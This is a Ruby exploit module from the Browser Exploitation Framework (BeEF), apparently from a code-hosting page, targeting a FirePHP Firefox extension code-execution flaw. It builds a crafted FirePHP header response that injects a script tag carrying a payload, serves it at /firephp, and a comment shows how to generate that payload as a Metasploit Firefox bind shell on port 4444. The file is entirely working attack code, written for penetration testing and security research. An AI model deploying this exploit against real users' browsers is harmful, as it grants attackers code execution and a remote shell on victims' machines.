57 lines
2.4 KiB
Ruby
57 lines
2.4 KiB
Ruby
#
|
|
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
###
|
|
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
|
|
###
|
|
class Firephp_code_exec < BeEF::Core::Command
|
|
def pre_send
|
|
rand_str = rand(32**10).to_s(32)
|
|
|
|
# load payload.js file
|
|
# generate payload:
|
|
# msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
|
|
payload = ''
|
|
f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
|
|
f.each_line do |line|
|
|
payload << line
|
|
end
|
|
f.close
|
|
|
|
# construct exploit+payload HTTP response
|
|
exploit = {
|
|
'RequestHeaders' => {
|
|
'1' => rand(10).to_s,
|
|
'2' => rand(10).to_s,
|
|
'3' => rand(10).to_s,
|
|
'4' => rand(10).to_s,
|
|
'5' => rand(10).to_s,
|
|
'6' => rand(10).to_s,
|
|
'7' => rand(10).to_s,
|
|
'8' => rand(10).to_s,
|
|
'9' => rand(10).to_s,
|
|
"<script>#{payload}<\/SCRIPT>" => rand_str
|
|
}
|
|
}.to_json
|
|
|
|
# mount exploit+payload at /firephp
|
|
# @todo use Router class instead of bind_raw()
|
|
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
|
|
{
|
|
'Content-Type' => 'text/html',
|
|
'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
|
|
'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
|
|
'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
|
|
'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
|
|
},
|
|
rand_str, # HTTP body
|
|
'/firephp', # URI mount point
|
|
-1)
|
|
end
|
|
|
|
def post_execute
|
|
save({ 'result' => @datastore['result'] })
|
|
end
|
|
end
|